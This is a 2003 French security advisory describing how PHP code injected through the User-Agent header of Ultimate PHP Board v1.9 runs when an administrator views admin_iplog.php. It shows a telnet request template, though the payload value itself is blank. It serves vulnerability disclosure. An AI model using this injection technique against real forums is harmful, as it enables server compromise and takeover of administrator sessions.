Ultimate PHP Board Arbitrary Code Execution Vulnerability

 Date de Publication: 2003-05-27
 Titre: Ultimate PHP Board Arbitrary Code Execution Vulnerability
 K-Otik ID : 0118
 Exploitable à distance : Oui
 Exploitable en local : Oui

 
 * Description Technique - Exploit *
 
Une vulnérabilité existe dans Ultimate PHP Board, celle ci est due à une erreur de vérification et validation qui touche le header "User-Agent:". Un attaquant peut exploiter cette faille en injectant du code PHP, qui sera exécuté dés qu'un administrateur visite la page "admin_iplog.php".

 e@some_host$ telnet hostname 80
Connected to hostname at 80
GET /board/index.php HTTP/1.0
User-Agent:

Ce code sera executé dés qu'un admin exécute admin_iplog.php.

  * Versions Vulnérables *

Ultimate PHP Board v1.9
  
  * Solution *

http://www.myupb.com


  * Crédits *
 
Faille découverte par euronymous (Mai 2003).

 

Audits de Sécurité & Tests Intrusifs F-VNS Security™ Mailing Listes Advisories Service Publicitaire

2002-2003 © Copyright K-OTiK Security